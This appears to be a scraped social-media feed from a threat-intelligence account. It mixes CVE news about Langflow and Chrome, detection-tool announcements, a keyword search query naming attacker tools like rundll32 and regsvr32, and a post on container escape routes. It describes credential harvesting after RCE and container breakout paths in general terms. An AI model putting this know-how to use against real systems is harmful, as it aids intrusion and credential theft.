DFIR_TNT

@cyb3rops @anton_chuvakin Same capabilities will be free for every bad guy in a matter of months.

Omg ... Some people talk about Mythos as if some new Oppenheimer had built a bomb What matters far more for the real security landscape is that open models with Opus 4.5-level capabilities get republished as uncensored versions within days and become effectively impossible to control

Introducing honeyslop: code canaries for open-source maintainers drowning in AI-hallucinated vulnerability reports. A short release thread

Chrome zero-day #4 in 2026. CVE-2026-5281 — use-after-free in WebGPU, confirmed active exploitation. If you run Chrome in your environment, this isn't a "schedule it" patch. It's a today patch.

CVE-2025-3248 — Langflow's /api/v1/validate/code executes user-supplied Python before auth. CVSS 9.8. CISA KEV. Post-RCE, attackers run printenv. Langflow holds LLM API keys, database conxn strings, and cloud creds. High value density in a single process. #AIAgents

The LangFlow CVE-2026-33017 is a good reminder that AI pipeline tools carry the same attack surface as any other application — plus your LLM API keys, your database credentials, and your agent logic. 20 hours to exploitation in the wild with no public POC.

thehackernews.com/2026/03/critic… 20 hours to exploitation in the wild. No public PO./ AI orchestration tools like this have 1 layer of defense, when it fails, its full 0-auth arbitrary code execution. If you have this exposed, consider it compromised. #aisecuritty #zeroday

CVE-2026-33017: Unauthenticated RCE in Langflow (CVSS 9.3). Exploited within 20 hours of disclosure. Second critical RCE in under a year — same root cause. AI orchestration tooling is now a first-class attack surface. 📷 thehackernews.com/2026/03/critic… #InfoSec #AISecurity #ThreatIntel

Amazing! Can't wait to try it!!

Introducing Huntable CTI Studio: LLM-powered Sigma rule generation from threat intel. Transparent pipelines, tunable agents, open source. bit.ly/4c9at7S #Sigma #ThreatHunting #DetectionEngineering

You can now fine-tune LLMs with Unsloth then deploy them in @LMStudio! 🦥👾 We made a free notebook to fine-tune FunctionGemma (270M) so it “thinks” before calling tools, then export the model to GGUF for deployment in LM Studio. Notebook: colab.research.google.com/github/unsloth…

HuntableGPT now uses retrieval-augmented context. - 250 intel samples - 170 linked SIGMA rules - SIGMA rule guides by @blubbfiction @cyb3rops Refining hunt logic generation through clearer examples + references. 🔗 lnkd.in/eqSky_UU #Huntable #ThreatHunting #SIGMA

powershell.exe OR base64 OR "event id" OR sysmon OR wmic OR appdata OR programdata OR hklm OR regasm OR regsvr32 OR hxxp OR spawn) -forensics -learn -guide -gartner

Hi, it's future me! my best answer: (breach OR attack OR persistence OR compromise OR "lateral movement" OR "hunt" OR "detection" OR "threat actor") (rundll32 OR cmd.exe OR ....

#DFIR #ThreatIntel How do you folks find great intel reports? Google dorks please..

In order for billions of people to "vibe code" we need a tool with the power of Cursor, and the simplicity of ChatGPT. Early Access wave one begins today.

We have tested CVE-2025-24813. Under specific circumstances, an exploit sent to a vulnerable Apache web server running outdated Tomcat software could lead to remote code execution. We used a 2-step method that resulted in a successful attempt. Details at bit.ly/426Njtp

F Ukraine? Free Ukraine!

“But containers are isolated processes” Is something I heard as recently as 14 days ago, when I was training a class on Cloud Security Incident Management at a Fortune 100 Bank. And this was a statement made by a Security Architect at said bank I nearly choked on the water I was swigging, as I was talking for 3 hours straight. And I had the following convo with him A lot of us think of Containers like we think of VMs. The fact that they appear to have the same file systems and binaries as a Debian, ubuntu or an alpine also further validates that initial (wrong) thought. Containers are processes that share the OS Kernel. The use multiple namespaces like user, file-system, network, etc. They are constrained by cgroups to manage resource usage such as CPU, Disk, I/O, Network bandwidth, etc. They definitely so *some* isolation, but I see this is more as a way to achieve consistent packaging so they run consistently across multiple environments. The reasons why containers are so good at what they do, is because they are able to constrain the process they are meant to run (i.e. an app, etc) in namespaces and cgroups that they appear isolated. However, this is far from true in most cases because of the way we run containers. We run containers mostly in orchestration systems. Like Kubernetes, Fargate, Cloud Run, Azure Container Instances, etc. When we run them on these orchestration systems, they need to “do things” i.e. make network calls to internal and external applications, have volumes mounted for persistent access, need access to service accounts (on kubernetes or the cloud) to access resources on these environments, or several other things The isolation offered here is not a security boundary. They are sharing the kernel with other containers that are running on the same underlying (Virtual) Machine. Attackers can leverage a variety of ways to “break out” of a container. Ranging from leveraging volume mounts to be able to write/read or even privilege escalate based on file paths, to compromising service account tokens using RCEs and SSRF attacks to gain access to cloud credentials and subsequently privilege escalate into the cloud for persistence, exfiltration or more. Coupled with misconfigurations on Kubernetes (which are there quite often) and the underlying cloud (which are also plentiful), vulnerabilities in the container images itself (also very common), containers are a great way to break into environments. Attackers often identify vulnerabilities in applications running on containers, leverage these vulnerabilities to find that they can easily gain privileged access into cloud environments. So coming back to my original point. Containers are isolated. Yes. But they are isolated for the purposes of great packaging and the subsequent consistency it offers. They are not isolated for security. Not nearly enough.

I love the development the MDE team puts into expanding the telemetry! Our slackbot informed me JA3 / JA3S hashes are now recorded. Pretty cool for hunting and detection engineering!

Happy #InternationalWomensDay. It inspires me to think about how far we have come in my lifetime. It motivates me to think about how far we still have to go.